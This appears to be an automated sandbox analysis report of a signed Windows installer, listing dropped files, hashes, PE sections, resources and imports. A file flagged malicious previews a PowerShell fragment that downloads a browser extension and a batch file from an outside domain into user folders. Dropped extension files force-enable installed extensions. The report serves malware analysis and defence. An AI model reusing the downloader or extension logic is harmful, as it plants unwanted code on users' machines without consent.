                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:9o51AbfOcQ8k1jauBufvX4WvjJudHaUtlGP9kY9nh:+8TmFpgZNy0V
                                                                                                                                                                            MD5:A60D4DFD69846FCB0ED0D35ACDB2DE5C
                                                                                                                                                                            SHA1:4347421C592095AC7012D2660100027FA35EA91E
                                                                                                                                                                            SHA-256:B5553BDD13B5E551AE22204C9A8BDD95528C9A29DDA1960469B628762F50766B
                                                                                                                                                                            SHA-512:0C4F091958B15B13AB17805E2F9364CBB88158283F1A6B82A28B601C347CE184F1563C32A6979F063ED5BA05948092BE004073512741FBC93C7692729E6AD58E
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:..$.d.o.m.a.i.n. .=. .".h.t.t.p.s.:././.s.e.c.u.r.e...c.h.r.o.m.s.t.e.r.a...c.o.m./.c.r.o.s.s./.c.r.x.3.d.y.n.a.m.i.c.".;.....$.a.d.v. .=. .".4.2.6.".;.....$.v.e.r. .=. .".4...4.".;.........$.t.i.m.e.s.t.a.m.p. .=. .(.[.D.a.t.e.T.i.m.e.O.f.f.s.e.t.].(.G.e.t.-.D.a.t.e.).)...T.o.U.n.i.x.T.i.m.e.S.e.c.o.n.d.s.(.).;.....$.W.e.b.C.l.i.e.n.t. .=. .N.e.w.-.O.b.j.e.c.t. .S.y.s.t.e.m...N.e.t...W.e.b.C.l.i.e.n.t.;.....$.l.o.c.a.t.i.o.n. .=. .$.e.n.v.:.L.O.C.A.L.A.P.P.D.A.T.A.;.........$.W.e.b.C.l.i.e.n.t...D.o.w.n.l.o.a.d.F.i.l.e.(.$.d.o.m.a.i.n. .+. ."./.?.a.d.v.=.". .+. .$.a.d.v. .+. .".&.v.=.". .+. .$.v.e.r. .+. .".&.t.i.m.e.=.". .+. .$.t.i.m.e.s.t.a.m.p.,. .".$.l.o.c.a.t.i.o.n.\.a.p.p.s...c.r.x.".).;.....$.W.e.b.C.l.i.e.n.t...D.o.w.n.l.o.a.d.F.i.l.e.(.$.d.o.m.a.i.n. .+. ."./.c.o.n.f.i.g...p.h.p.?.v.=.". .+. .$.v.e.r. .+. .".&.t.i.m.e.=.". .+. .$.t.i.m.e.s.t.a.m.p.,. .".$.l.o.c.a.t.i.o.n.\.T.e.m.p.\.c.o.n.f.i.g...b.a.t.".).;.....#. .S.I.G. .#. .B.e.g.i.n. .s.i.g.n.a.t.u.r.e. .b.l.o.c.k.....#.

                                                                                                                                                                            C:\Windows\Temp\~DF41C2E1EFD4B4AE7A.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):81920
                                                                                                                                                                            Entropy (8bit):0.23122242023582953
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:tT4dTSkdMdlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDWOa5ZQZK:2sGlXHZAtatn3gOa5u
                                                                                                                                                                            MD5:BFE97814B4AEF39DE97FF0E91FEBF6E6
                                                                                                                                                                            SHA1:40469084CA3E46F5ECF0741355356BA410EAA591
                                                                                                                                                                            SHA-256:48EFF268A836C5758F8AEEECEBFCC3867DED1E65B4F03FBDC3C34A68B500A46C
                                                                                                                                                                            SHA-512:4706C028DC9CA6ECEAFEA3203CA68C190778F6F3CE6BE2083B94E33502A1D5B9C593392BCE4FD88A49BC58E03D7D518AFA945CD9CC52BF2718710F1517FDF059
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\~DF65B9870B20D59392.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):0.10349372950319229
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:xPLG7iVCnLG7iVrKOzPLHKOU9TrEQQRskSzgmWSfyWvbEQR4lSVky6l+1:50i8n0itFzDHFkTNQRskSpW6QQR4z+1
                                                                                                                                                                            MD5:AF75429D0D2630E39EA6B0CF9CB9FBDB
                                                                                                                                                                            SHA1:FE1A251A51825ADB241C40C0B6CCB4538CCA5133
                                                                                                                                                                            SHA-256:98C3080603C73890CCAF2FC4BBDFAD1A1F679972BED3DFC5CFD56170545D778B
                                                                                                                                                                            SHA-512:E189DCFF84A1AA542AD7C5AAB90CEE3563F90E2B4D309F607E1C78CE568367D5CCCA9C263EA83D7B3154649885D76915DA3C05E7992126C2F2AB7DD8A8B938DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\~DF8A79F01E0058BCB6.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Windows\Temp\~DFD70B4A65507E3CBD.TMP

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                            Entropy (8bit):1.4778506022448366
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:dbMubs4aFXzBT5lUkKvy9dlGb4pWSkdFE4pB+9iH9Z9f/ZpHAtvC5v1v/vqsDFDS:NMv/TLkeGlXHZAtatn3gOa5R
                                                                                                                                                                            MD5:6E923EF4AFB8BB8C0852F4635C6CE2A8
                                                                                                                                                                            SHA1:4F272659CD8830829A49F2FD467D5507D173FAC6
                                                                                                                                                                            SHA-256:64337AA249EBD51495A3837CB2EC1F7FB85DBEB5C044AB87C5ADFC124F6C898B
                                                                                                                                                                            SHA-512:42E734F29C1108335D716632DDD26C585469DB4BEAE899E31B9F0B1144F19248D153B0EC48AA5758A0EE2B070EEB992FEFC75046C23E5812136877DBB7785E5E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\apps-helper\manifest.json

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                            Entropy (8bit):4.7231140420608595
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:EW/C0sX0gk/hsu1wC6VAPk8yyWSD9kn+E8qqXY:r6XXChsu1wXAPk8Sic+Ev
                                                                                                                                                                            MD5:8CB0ACA2B1457CCDFFE28F9843BED9F5
                                                                                                                                                                            SHA1:DCFF694B3F2EAC4BCA4A6B96F32026D1CAD9FB83
                                                                                                                                                                            SHA-256:15DB2B5B55E74489DD4AD623328FBC10022BDE652C6099DD07D93F6263663C62
                                                                                                                                                                            SHA-512:07E99C3684C9952D1CD9AD42BA147B934023392B1ABD2FD688C585505C197FEF9EAA5804F6413D9BE8217F6C66CFD3F09E05D1ACE57230380C0F9B4AD333E670
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{..."name": "Apps Helper",..."description": "",..."version": "1.0",..."manifest_version": 3,..."background": {...."service_worker": "service.js",...."type": "module"...},..."permissions": ["management", "background"]..}

                                                                                                                                                                            C:\apps-helper\service.js

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):103
                                                                                                                                                                            Entropy (8bit):4.609766703102874
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:YUkOBLojM3BfnNTUcgLEHJlLDKcXpyYf:YXOBLow3htJTzD1pyYf
                                                                                                                                                                            MD5:3910AD193C862FFB7029097B93974D94
                                                                                                                                                                            SHA1:4C68DE8A20ECC80F76061F1D552C1F8C1AF015F0
                                                                                                                                                                            SHA-256:F95175FBBA42C31C2D4C68DB2CE857A570BDB146909CCF673E6FC647B6A474B3
                                                                                                                                                                            SHA-512:91A876FDB422EDA7F20F03C0C9B3454156DEC326E46BF69D0395A6885BAE0D1781D743E2C5CB0BD4D356DDEA1757ECA9DECDAD187271D5C5AFF011B125E70942
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:chrome.management.onInstalled.addListener(info => {...chrome.management.setEnabled(info.id, true);..});

                                                                                                                                                                            \Device\Null

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Windows\System32\timeout.exe
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):4.4936933125951875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:hYFJAR+mQRKVxLZRtWcyn:hYFDaNZiRn
                                                                                                                                                                            MD5:1E2AC613338A8A1B2FAA866942CF7289
                                                                                                                                                                            SHA1:57BDF3D09C298EF7626707C60DFAC8E2E12B0405
                                                                                                                                                                            SHA-256:D676A2AE7C46320E1591C41EFF3848BBC49C6CD99B9B95FE4E43D6126E2799AA
                                                                                                                                                                            SHA-512:FA359C579CBC4994996634DBA18BA29187BC6742C34508D5C3F6530DC14D10807D6BBB8D95DF4225AE6F620B2B517069D0AC4DF8D757105D39FB6D302D570CFF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..Waiting for 5 seconds, press a key to continue ....4.3.2.1.0..

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):6.734472037700318
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 98.81%
                                                                                                                                                                            • Windows ActiveX control (116523/4) 1.15%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:setup.exe
                                                                                                                                                                            File size:9'454'152 bytes
                                                                                                                                                                            MD5:8aca54559265d2a9ad0a810c425c644f
                                                                                                                                                                            SHA1:39d22f9333c9682bb860cf644d66996f7a641666
                                                                                                                                                                            SHA256:af11a10ef1964b801f070d073cf89f3b4e6eecab2943af9cb011151df65ecfd2
                                                                                                                                                                            SHA512:58828b7069bc0bd4d731b6b8fb5ab67c0352b24b71cbe504c6a01381ea0a6b0e6f3cfc5adbf732d3f0a4b72692d30038586b91cb55a15e0c02628017813328b5
                                                                                                                                                                            SSDEEP:98304:lLKJzFgMQ0dgyNsqWGXwt2Hj8uYJRr+uKTFK+XpBflMPzidUtYoS9PURx1RK/Tvt:xKJzFgMhXQVJ1eBfM2NP6cr/Mxbq
                                                                                                                                                                            TLSH:A4968D21758AC537E67A01B16A2CDAAB61797EB20B7154CBB3DC3D6E0B704C21336E17
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."2..La..La..La".O`..La".I`J.La".J`..LaU.H`..LaU.O`..LaU.I`..La".H`..La".M`..La".K`..La..Ma..La..E`..La...a..La...a..La..N`..L

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:2f232d67b7934633

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x5e0862
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x64C23AA7 [Thu Jul 27 09:36:39 2023 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:6
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:21314122cd4542a6b9b297f52a87acbe

                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                            Signature Valid:true
                                                                                                                                                                            Signature Issuer:CN=GlobalSign GCC R45 CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                            Signature Validation Error:The operation completed successfully
                                                                                                                                                                            Error Number:0
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 05/08/2023 10:08:47 24/12/2023 11:38:55
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • E=admin@dragonboss.com, CN=Dragon Boss Solutions LLC, O=Dragon Boss Solutions LLC, L=Sharjah, S=Sharjah, C=AE
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:21C8F80B27367C1F3AD526555D6B895C
                                                                                                                                                                            Thumbprint SHA-1:925DE27A297B9C416C251935EFE64219F41EC0F5
                                                                                                                                                                            Thumbprint SHA-256:DE315EF07FF351A66A60C3E97C4E04D3E1B445E406C8F7A7E4F2C0765DDF8162
                                                                                                                                                                            Serial:72A7B646BA49E796A7EF012C

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007F00190F11BDh
                                                                                                                                                                            jmp 00007F00190F09EFh
                                                                                                                                                                            mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop edi
                                                                                                                                                                            pop edi
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop ebx
                                                                                                                                                                            mov esp, ebp
                                                                                                                                                                            pop ebp
                                                                                                                                                                            push ecx
                                                                                                                                                                            ret
                                                                                                                                                                            mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                            xor ecx, ebp
                                                                                                                                                                            call 00007F00190F0040h
                                                                                                                                                                            jmp 00007F00190F0B52h
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                            ret
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            mov dword ptr [ebp-10h], eax
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax
                                                                                                                                                                            ret
                                                                                                                                                                            push eax
                                                                                                                                                                            push dword ptr fs:[00000000h]
                                                                                                                                                                            lea eax, dword ptr [esp+0Ch]
                                                                                                                                                                            sub esp, dword ptr [esp+0Ch]
                                                                                                                                                                            push ebx
                                                                                                                                                                            push esi
                                                                                                                                                                            push edi
                                                                                                                                                                            mov dword ptr [eax], ebp
                                                                                                                                                                            mov ebp, eax
                                                                                                                                                                            mov eax, dword ptr [006FC024h]
                                                                                                                                                                            xor eax, ebp
                                                                                                                                                                            push eax
                                                                                                                                                                            mov dword ptr [ebp-10h], esp
                                                                                                                                                                            push dword ptr [ebp-04h]
                                                                                                                                                                            mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                            mov dword ptr fs:[00000000h], eax

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2fa4540x28.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x30a0000x298c4.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x9012680x2fe0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x3340000x28bec.reloc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x29cfb00x70.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x29d0400x18.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26dd600x40.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x26c0000x2ec.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x2f77c00x280.rdata
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .text0x10000x26acb60x26ae006609ee5ad35366535f89171104fd9407unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rdata0x26c0000x8f55a0x8f60082a48c8eed166a4419b55b922166495dFalse0.3128150201612903data4.603054902016689IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .data0x2fc0000xd2400x3c00624471f60c55363d0bdc9e3921a90c7eFalse0.2658203125data4.770105146258243IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                            .rsrc0x30a0000x298c40x29a00804290f0c11d503cf8d27bb1e4d0f331False0.13437851914414414data5.189659274032121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .reloc0x3340000x28bec0x28c007704ec72484064d3d713def4a99cb43bFalse0.4435151457055215data6.513339108201383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                            RT_BITMAP0x30a9100x13eDevice independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 5 important colorsEnglishUnited States0.25471698113207547
                                                                                                                                                                            RT_BITMAP0x30aa500x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.03017241379310345
                                                                                                                                                                            RT_BITMAP0x30b2780x48a8Device independent bitmap graphic, 290 x 16 x 32, image size 0EnglishUnited States0.11881720430107527
                                                                                                                                                                            RT_BITMAP0x30fb200xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                                                                                                                                                                            RT_BITMAP0x31058c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                                                                                                                                                                            RT_BITMAP0x3106e00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                                                                                                                                                                            RT_ICON0x310f080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0, 16 important colorsEnglishUnited States0.6216216216216216
                                                                                                                                                                            RT_ICON0x3110300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colorsEnglishUnited States0.5794797687861272
                                                                                                                                                                            RT_ICON0x3115980x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0, 16 important colorsEnglishUnited States0.5080645161290323
                                                                                                                                                                            RT_ICON0x3118800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colorsEnglishUnited States0.5446750902527075
                                                                                                                                                                            RT_ICON0x3121280x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.3621951219512195
                                                                                                                                                                            RT_ICON0x3127900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.4224413646055437
                                                                                                                                                                            RT_DIALOG0x3136380xacdataEnglishUnited States0.7151162790697675
                                                                                                                                                                            RT_DIALOG0x3136e40xccdataEnglishUnited States0.6911764705882353
                                                                                                                                                                            RT_DIALOG0x3137b00x1b4dataEnglishUnited States0.5458715596330275
                                                                                                                                                                            RT_DIALOG0x3139640x136dataEnglishUnited States0.6064516129032258
                                                                                                                                                                            RT_DIALOG0x313a9c0x4cdataEnglishUnited States0.8289473684210527
                                                                                                                                                                            RT_STRING0x313ae80x234dataEnglishUnited States0.4645390070921986
                                                                                                                                                                            RT_STRING0x313d1c0x182dataEnglishUnited States0.5103626943005182
                                                                                                                                                                            RT_STRING0x313ea00x50dataEnglishUnited States0.7375
                                                                                                                                                                            RT_STRING0x313ef00x9adataEnglishUnited States0.37662337662337664
                                                                                                                                                                            RT_STRING0x313f8c0x2f6dataEnglishUnited States0.449868073878628
                                                                                                                                                                            RT_STRING0x3142840x5c0dataEnglishUnited States0.3498641304347826
                                                                                                                                                                            RT_STRING0x3148440x434dataEnglishUnited States0.32899628252788105
                                                                                                                                                                            RT_STRING0x314c780x100dataEnglishUnited States0.5703125
                                                                                                                                                                            RT_STRING0x314d780x484dataEnglishUnited States0.39186851211072665
                                                                                                                                                                            RT_STRING0x3151fc0x1eadataEnglishUnited States0.44081632653061226
                                                                                                                                                                            RT_STRING0x3153e80x18adataEnglishUnited States0.5228426395939086
                                                                                                                                                                            RT_STRING0x3155740x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                                                                                                                            RT_STRING0x31578c0x624dataEnglishUnited States0.3575063613231552
                                                                                                                                                                            RT_STRING0x315db00x660dataEnglishUnited States0.3474264705882353
                                                                                                                                                                            RT_STRING0x3164100x2e2dataEnglishUnited States0.4037940379403794
                                                                                                                                                                            RT_GROUP_ICON0x3166f40x5adataEnglishUnited States0.7333333333333333
                                                                                                                                                                            RT_VERSION0x3167500x33cdataEnglishUnited States0.4251207729468599
                                                                                                                                                                            RT_HTML0x316a8c0x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                                                                                                                            RT_HTML0x31a2c40x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                                                                                                                            RT_HTML0x31b5dc0x8c77HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.08081426068578103
                                                                                                                                                                            RT_HTML0x3242540x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                                                                                                                            RT_HTML0x32ad240x6a2HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3486454652532391
                                                                                                                                                                            RT_HTML0x32b3c80x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                                                                                                                            RT_HTML0x32c4140x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                                                                                                                            RT_HTML0x32d9c80x205cexported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13604538870111058
                                                                                                                                                                            RT_HTML0x32fa240x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                                                                                                                            RT_MANIFEST0x3330b40x80fXML 1.0 document, ASCII text, with CRLF, LF line terminatorsEnglishUnited States0.40814348036839554

                                                                                                                                                                            Imports

                                                                                                                                                                            DLLImport
                                                                                                                                                                            KERNEL32.dllCreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CreateThread, LoadLibraryExW, GetCurrentProcess, Sleep, WideCharToMultiByte, GetDiskFreeSpaceExW, DecodePointer, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, FormatMessageW, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, 